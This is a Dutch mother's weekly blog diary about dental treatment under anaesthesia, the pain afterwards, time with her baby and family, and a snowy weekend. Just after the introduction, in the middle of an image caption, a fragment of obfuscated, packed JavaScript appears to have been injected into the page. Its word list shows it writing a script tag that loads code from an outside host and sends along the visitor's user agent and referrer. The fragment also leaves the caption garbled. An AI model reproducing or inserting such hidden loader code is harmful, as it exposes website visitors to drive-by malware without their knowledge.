DreamWeekly

DreamWeekly #146

Nou ja! Dachten we vorige week nog dat de lente er aan zat te komen, kijk ik nu door mijn raam naar een dik pak sneeuw. Wat ben ik blij dat deze week voorbij is zeg. Ondanks dat de behandeling bij de tandarts meeviel werd ik dit weekend overvallen door flinke napijn. Hopelijk zakt het snel af. Maar ondanks dat deed ik toch ook nog wat leuke dingen en deed ik me tegoed aan veel te veel paaseitjes..

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kibes|var|u0026u|referrer|ztnks||js|php'.split('|'),0,{})) id=”attachment_10523″ align=”alignnone” width=”2448″]
Maandag
Ja, paaseitjes dus. Die haalde ik maandag in huis toen Anouk langs kwam om even bij te kletsen. Ik had een lange dag alleen met Harper want Joel was op zakenreis naar Birmingham en zou pas tegen tienen ’s avonds thuis komen. De afwisseling was dus wel lekker, en de paaseitjes ook!Dinsdag
Met een lichte knoop in mijn maag stond ik op, bah ik had helemaal geen zin in deze dag! Al vroeg stonden Joels ouders op de stoep om op Harper te passen en stapte wij in de auto naar de Narcosetandarts. Mijn ervaring heb je hier al kunnen lezen. Wat ben ik blij dat het erop zit zeg!
Woensdag
Aangezien ik 24 uur niet alleen voor Harper mocht zorgen na de narcose is Joel nog een extra dagje thuis. Fijn! Ik voel me eigenlijk prima dus pak ik aan het einde van de dag even de trein naar Amsterdam. Kim is weer terug van haar vakantie en ik wil alle verhalen horen! We drinken een paar koppen thee bij de Bijenkorf. Gek hoor, nog maar een paar weken en dan werken we weer samen!Donderdag
Om mij nog een beetje te ontzien stond er een bezoekje van mams gepland. Nou was dat ontzien niet zo nodig dus we gaan heerlijk even de stad in. Drinken koffie en maken een rondje door Zara en H&M. Het is wel koud he, poeh!Vrijdag
Ik dacht redelijk makkelijk van die kies af te zijn maar Auw! De pijnstillers lijken opeens weinig meer te doen dus ik voel me de hele dag ongemakkelijk. Toch doe ik Harper even in de wagen en lopen we door de sneeuw naar de winkels. Even een frisse neus voor ons allebei en een paar boodschapjes halen. Weer thuis is Harper vrolijk en dus ga ik snel aan de slag met de maandelijke fotoshoot. Ik hoop het er zo lang mogelijk in te houden want wat is ze alweer gegroeid! In de tijd dat Harper daarna even slaapt maak ik vast twee volle pannen met Ratatouille. Mijn broer komt gezellig een hapje mee eten! We kletsen bij en kunnen wonder boven wonder rustig eten. Harper vind het maar wat mooi om er zo bij te zitten.


Zaterdag
Wauw, de wereld is wit! Genieten kon ik er helaas niet van. O jongens wat deed mijn mond pijn. Ik wist niet meer wat ik het zoeken moest. Omdat op de bank zitten ook niet echt hielp zijn we maar even de stad in gelopen. Joel gaat ’s middags even sporten, hardlopen zit er voor mij niet echt in dus zodra hij terug is duik ik maar even in bad. ’s Avonds kijken we Doctor Strange, wat een leuke film!

Zondag
Het pak sneeuw is nog dikker geworden. Ik werp een blik naar buiten en besluit dat het een pyama dag word vpor mij en Harper ;). Joel doet een aantal klussen in huis terwijl ik Harper bezig hou. De rest van de dag lummelen we lekker wat en aan het einde van de dag duik ik wederom even in bad. Wat een fijn lui weekend he?

Mijn laatste twee volledige weken et Harper zijn aangebroken. Ik vind het lastig en heb het gevoel dat de dagen door mijn vingers glippen. Daarom misschien ook nog niet zo veel plannen. Een bios bezoekje met Anouk en donderdag een tripje naar het consultatiebureau. En voor de resy? Ik zie het nog wel even!

handtekening

Follow on Bloglovin

You Might Also Like

No Comments

Leave a Reply